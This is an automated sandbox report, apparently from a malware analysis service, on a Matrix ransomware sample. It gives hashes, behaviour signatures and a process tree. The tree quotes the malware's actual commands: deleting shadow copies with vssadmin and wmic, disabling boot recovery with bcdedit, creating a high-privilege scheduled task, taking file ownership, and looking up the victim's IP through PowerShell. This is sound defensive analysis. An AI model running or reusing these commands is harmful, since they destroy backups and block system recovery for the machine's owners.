Overview

overview

10

Static

static

907636b28d...8c.exe

windows7-x64

10

907636b28d...8c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-11-2022 12:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    907636b28d162f7110b067a8178fa38c.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Score
10/10
matrixdiscoveryevasionpersistenceransomwareupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe
    "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe"
    1⤵
    • Matrix Ransomware
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe" "C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe"
      2⤵
        PID:4816
      • C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe
        "C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe" -n
        2⤵
        • Executes dropped EXE
        PID:4760
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\aWUc913K.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:792
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u5msjCEb.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5032
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u5msjCEb.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:4252
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:4704
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:4136
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:552
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs"
              3⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:428
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4928
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:3736
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3552
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:3468
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QSIInvIW.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3328
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                3⤵
                • Views/modifies file attributes
                PID:4064
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
                3⤵
                  PID:536
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3968
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c aczo234m.exe -accepteula "store.db" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3960
                  • C:\Users\Admin\AppData\Local\Temp\aczo234m.exe
                    aczo234m.exe -accepteula "store.db" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4784
                    • C:\Users\Admin\AppData\Local\Temp\aczo234m64.exe
                      aczo234m.exe -accepteula "store.db" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Sets service image path in registry
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4892
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:3512
              • C:\Windows\system32\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                2⤵
                • Interacts with shadow copies
                PID:4128
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic SHADOWCOPY DELETE
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1932
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4288
                • C:\Windows\system32\vssadmin.exe
                  "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:812
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:3728
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:4368
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN DSHCA /F
                2⤵
                  PID:3716
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3092

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                16KB

                MD5

                a940f5a3065bd1f806f880f27de0ebd7

                SHA1

                145fe0103db6f6685307b73d24cd29c24def2efd

                SHA256

                70d9faaebcd07dc0ae57ae0e049352b88f9634ebb8078c29018dffc8864ed2ef

                SHA512

                82a1c64b0ff9f45b8fa748501c540fe8221b450a9f01a96f860b058a02cf3efff580a0e4183f40767300738b2958758b884c418b6a02706469901af95e45a196

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe
                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\NWTW8a7C.exe
                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\QSIInvIW.bat
                Filesize

                246B

                MD5

                6d2a10672e1c5f04b2d29f5b518c62c6

                SHA1

                eaecceda5b4646e14693993d41954123824cd455

                SHA256

                09bae4c21417617ad94c5f7ed1e546dea54bb60f5415953d49c0e002168cf4c5

                SHA512

                7c06adfbcd982153bb64e97e77c069369c3343cf2151847d564005a2997f7d49d04e61b6749a22df51278eb573e6ba21b5615f70271eba9c7e70b832a8892068

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\aWUc913K.txt
                Filesize

                14B

                MD5

                75564e2df4b8c8d33695e8e5e58cb03c

                SHA1

                64a796a9f01a1f12bcbe641ecc92541a41ece9b5

                SHA256

                bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965

                SHA512

                c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\aczo234m.exe
                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\aczo234m.exe
                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\aczo234m64.exe
                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\aczo234m64.exe
                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Roaming\KXZTPMk3.bat
                Filesize

                415B

                MD5

                9c13453e38fbd86395ed5801778c0184

                SHA1

                377ff2656afd7b629e5b0b694f7d2bdb43183ed3

                SHA256

                2d20298dcb8497c7fbcee4524a88c3e5ea8cae130d8bd14ba30b1f77d3addc03

                SHA512

                4722f788d0afb836e637a9b41d2cd35fb936ada1de9e4be5b574343adcfdf882229860bf831f6dfe614ea144f2c8e2f3fcbd86f84aa25ccbe587fad0fd226067

                Download Submit

              • C:\Users\Admin\AppData\Roaming\gEXzcVfw.vbs
                Filesize

                260B

                MD5

                2bf97203a0d426b757f9adf7186cd164

                SHA1

                8aae6d2fbda7a4684247288f3d7aa113aa0ade88

                SHA256

                3eb49d32abb9f63526d36ceb0c96ec41e7f4c1fa3f6f8714fe395926dcad10bb

                SHA512

                757a2991e5fb38da036e0eb59035f321691f776a8877b2962ece066052a3f0c97177b1fdcf7d46395aa7b33280283526d1de9583be84485d51ae2f5d7ee93257

                Download Submit

              • memory/792-139-0x0000000004E70000-0x0000000005498000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/792-138-0x0000000002390000-0x00000000023C6000-memory.dmp

                Filesize

                216KB

                Download

              • memory/792-145-0x00000000061C0000-0x00000000061DA000-memory.dmp

                Filesize

                104KB

                Download

              • memory/792-144-0x00000000074D0000-0x0000000007B4A000-memory.dmp

                Filesize

                6.5MB

                Download

              • memory/792-143-0x0000000005C90000-0x0000000005CAE000-memory.dmp

                Filesize

                120KB

                Download

              • memory/792-142-0x0000000005640000-0x00000000056A6000-memory.dmp

                Filesize

                408KB

                Download

              • memory/792-141-0x00000000055D0000-0x0000000005636000-memory.dmp

                Filesize

                408KB

                Download

              • memory/792-140-0x0000000004DE0000-0x0000000004E02000-memory.dmp

                Filesize

                136KB

                Download

              • memory/4288-175-0x0000013CB9A70000-0x0000013CB9A92000-memory.dmp

                Filesize

                136KB

                Download

              • memory/4288-179-0x00007FFDB5440000-0x00007FFDB5F01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4288-177-0x00007FFDB5440000-0x00007FFDB5F01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4784-166-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

                Download